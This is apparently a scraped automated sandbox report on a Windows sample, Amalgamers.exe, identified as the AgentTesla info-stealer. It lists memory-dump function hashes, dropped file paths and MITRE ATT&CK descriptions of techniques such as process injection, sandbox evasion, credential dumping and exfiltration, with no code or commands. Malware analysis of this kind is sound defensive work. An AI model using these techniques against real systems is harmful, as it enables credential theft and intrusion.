Opcode Fuzzy Hash: f51ec0133552f7d837cb0453649a971f03a6884986870ddcd1e5f66274fb152d
Instruction Fuzzy Hash: BE21A470A002419FDF31A765E4983AD3761FBD6319F2C096DE60EC7692D7ACCA82C742

Function 02CC9AB4 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7a33fa811153f2238e27df840c46725ba04fecb9f27f0b6c4cffa0f15dc8a8a
Instruction ID: 883454ce93bdff5a90602a27fac0bc843a04ca5631bb5fdc1a9c139b96d1f516
Opcode Fuzzy Hash: e7a33fa811153f2238e27df840c46725ba04fecb9f27f0b6c4cffa0f15dc8a8a
Instruction Fuzzy Hash: 02219031A102059FDB14DB69C964BAE77F6FF88724F208169E501EB3A4DB719D408B91

Function 02CC1660 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e06bc2fc77568aa8b6cff8f87fe8c7552652557f1e5bac0c21ed2c1b2cd5901f
Instruction ID: 84a46be08563ed3500b6dc1f6334f3298469ee02d4b0920a8f7280a6328cf202
Opcode Fuzzy Hash: e06bc2fc77568aa8b6cff8f87fe8c7552652557f1e5bac0c21ed2c1b2cd5901f
Instruction Fuzzy Hash: 1C21F2306401025FDB21EB28E994B5D3765EBC5304F284939E10ECB266E7BCD985CB92

Function 02CC91E1 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c21c92ba7999a9ec61fa52f1a4123fa7635353d6d4ef864bfd139ea001d4cac
Instruction ID: ac72eac7ef41163a7dab33e446d9748ea88b85d46e01e0cd8d6f44eb152e4a39
Opcode Fuzzy Hash: 1c21c92ba7999a9ec61fa52f1a4123fa7635353d6d4ef864bfd139ea001d4cac
Instruction Fuzzy Hash: 1621B631E00205DBDB09CFA5D890AEEB7B2BF89300F24866AE815F7344DB70E942CB40

Function 02C9D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875593077.0000000002C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c9d000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fafae275271e92be2896d144aa9a688096a19b457b9c2c18824620df015ccdf
Instruction ID: 3e0104db01cc379f1a35b06fea875116ece1eebb5fe52e39b3f44316bf5e4fd1
Opcode Fuzzy Hash: 0fafae275271e92be2896d144aa9a688096a19b457b9c2c18824620df015ccdf
Instruction Fuzzy Hash: 6F21F271604200DFDF14EF24D9C8B26BBA5EB84314F20C569D84A5B256C33AD447CAA2

Function 02CC91F0 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33ac392c08232ebf495f354b27706e7a68866f9de143c100dcb3b5fe8e083c53
Instruction ID: 753293fe71fc8aa80195154e80ed5c6b689c607446d3648d4ff0a455471d942f
Opcode Fuzzy Hash: 33ac392c08232ebf495f354b27706e7a68866f9de143c100dcb3b5fe8e083c53
Instruction Fuzzy Hash: 3B216231E002099BDB19CFA5D4946AEF7B6BF89310F24862AE815F7344DB70A946CB50

Function 02CC1848 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab3a11dfad80314781f476bfaa4b517713fe11aab9910d5b9ff7e08530bf8424
Instruction ID: 8bac03b8d26526e07b071492dce7356a345dcd24145bd51043fcc2c7e1513f01
Opcode Fuzzy Hash: ab3a11dfad80314781f476bfaa4b517713fe11aab9910d5b9ff7e08530bf8424
Instruction Fuzzy Hash: DF215930B042098FDB54EB66C5557AE77F2AF89244F24046DD00AFB3A5DB76CD01CBA1

Function 02CC1670 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05d3520cb7a1ae65f43115fdfe4699fd45069448d118142451b4058b6f36ba50
Instruction ID: b2a373726123cb65aadf1be86058f7fe91135beb8054718278476649352123ef
Opcode Fuzzy Hash: 05d3520cb7a1ae65f43115fdfe4699fd45069448d118142451b4058b6f36ba50
Instruction Fuzzy Hash: 95218E306401025FDF21EB29E998B5A7766E7C5314F244938E10ACB266EBBCD985CB92

Function 02CC1448 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf4a60a106ce3a7536cc35ad023d3ec76a1dbb7d8345ebb0bb09ef6c16ece57d
Instruction ID: e1d3cc9468af89a06299ed5d6365c514e0eea407cce1d6ad03a05cf6ad5b3bc2
Opcode Fuzzy Hash: cf4a60a106ce3a7536cc35ad023d3ec76a1dbb7d8345ebb0bb09ef6c16ece57d
Instruction Fuzzy Hash: 2A115131A112148FCF61EFBA88506AD77E2EB88311B3844BDE409E7242D776C942CB91

Function 02CC0838 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4239ab146b1219366e9c9ac2b32b3ee279763b069230d767cd253600725dda05
Instruction ID: 72f66f17093e2155ca9e5f2767dcb065d2275c0746ad170538e2be814722c5be
Opcode Fuzzy Hash: 4239ab146b1219366e9c9ac2b32b3ee279763b069230d767cd253600725dda05
Instruction Fuzzy Hash: 5711CE30A08201DFDF245BB8D85137A77A1EFC5214F24C97EE442EB242DB68CA82CBD1

Function 02CC0848 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59501898d90f994aae9d330a37dd00c48916343892780dcbf243943f0cd02b3a
Instruction ID: f783b73fcbf38f794f4ceaa2a6de91b3b2704e038b5304b80d0e8ace078ca35e
Opcode Fuzzy Hash: 59501898d90f994aae9d330a37dd00c48916343892780dcbf243943f0cd02b3a
Instruction Fuzzy Hash: 28116A30B08205DFDF64AA79D85076A72A1EFC5224F20C97DE106DB251EB69DA828BD1

Function 02C9D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875593077.0000000002C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c9d000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23793782ea0af9199fc74d22ad04f431962d98f374ab11550e6a8cdbbe53cffe
Instruction ID: cbb3f1c3adc2765cf0501820b7d0aa25ba588102e29f547eaab9dd47469e5ec7
Opcode Fuzzy Hash: 23793782ea0af9199fc74d22ad04f431962d98f374ab11550e6a8cdbbe53cffe
Instruction Fuzzy Hash: 082192755093C08FDB02CF24D594715BF71EB86214F28C5DAD8498F267C33A980ACBA2

Function 02CC1782 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 503025f5decc63a9882fe97ae801ab20866afe232a9a3e484c6b155e602924e5
Instruction ID: 85e8099a0c78a66cc7fd4272bea24f55f4c867a4ee89cf00416ae00bc539bcef
Opcode Fuzzy Hash: 503025f5decc63a9882fe97ae801ab20866afe232a9a3e484c6b155e602924e5
Instruction Fuzzy Hash: 1411E736B002018FCF119F75E844A6E7BF5FB88210F154125DA19D3301E7389902CB92

Function 02CC1458 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c072c6df475278d17a2a942a6f151252ca9a2f2b848b343eb571e6a76a77a8c
Instruction ID: 7a4a293a54cd500e290b061bdf859b8d2f21064164be3ac2072936714bee4ae3
Opcode Fuzzy Hash: 6c072c6df475278d17a2a942a6f151252ca9a2f2b848b343eb571e6a76a77a8c
Instruction Fuzzy Hash: 13012131A01319CFCF61EFBA845029DBBE5EB89210B2404BDD809E7241E775D9828B91

Function 02CC8182 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36253c577551e42a166eda92f1d08be1ba865e4a4f1d96f8fc8759b37f746f4a
Instruction ID: 15ffaa6501d6dbbccd60ea2b5891b0232cc8f9eff56823d04e5de67155117c6a
Opcode Fuzzy Hash: 36253c577551e42a166eda92f1d08be1ba865e4a4f1d96f8fc8759b37f746f4a
Instruction Fuzzy Hash: A2018430950249FFCB00EFA8E99098DBBB5EF85304F1045B9D044AB265EF346E46DB92

Function 02CC8190 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2875708023.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cc0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19fc8e9e898e4d36da82f94043344a48b1d57967b13d8807240ecbe81840e038
Instruction ID: d4f3c5cb126a5300b20d33face8ceb15dd59961afe514427fc5a937952855ae4
Opcode Fuzzy Hash: 19fc8e9e898e4d36da82f94043344a48b1d57967b13d8807240ecbe81840e038
Instruction Fuzzy Hash: 81F0F430950109FFCB04EBB8F98099DBBB5EB84304F1055B8D005AB254EF746E46DB92

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Amalgamers.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml

C:\Users\user\AppData\Local\Reglements216\Fessewise\Amalgamers.exe

C:\Users\user\AppData\Local\Reglements216\Fessewise\Amalgamers.exe:Zone.Identifier

C:\Users\user\AppData\Local\Reglements216\Fessewise\personalebladets.beh

C:\Users\user\AppData\Local\Reglements216\Fessewise\springsttten.kha

C:\Users\user\AppData\Local\Reglements216\Fessewise\sutra.txt

C:\Users\user\AppData\Local\Reglements216\Restaureringens.aan

C:\Users\user\AppData\Local\Reglements216\beefaloes.pop

C:\Users\user\AppData\Local\Reglements216\brunmaskets.ryg

C:\Users\user\AppData\Local\Reglements216\leptometer.anm

C:\Users\user\AppData\Local\Reglements216\ligedannede.afs

C:\Users\user\AppData\Local\Reglements216\mononitride.mis

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_33ofichi.22b.ps1

Windows Analysis Report
Amalgamers.exe

Function 0040320C Relevance: 93.1, APIs: 32, Strings: 21, Instructions: 366
stringcomfileCOMMON

Function 00405205 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Function 00403B6B Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Function 004037CE Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402D63 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 00405FC2 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 199
stringCOMMON

Function 00402F9C Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166
COMMON

Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 004050C7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Application Log: Application Log Content, Cloud Storage: Cloud Storage Access, Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre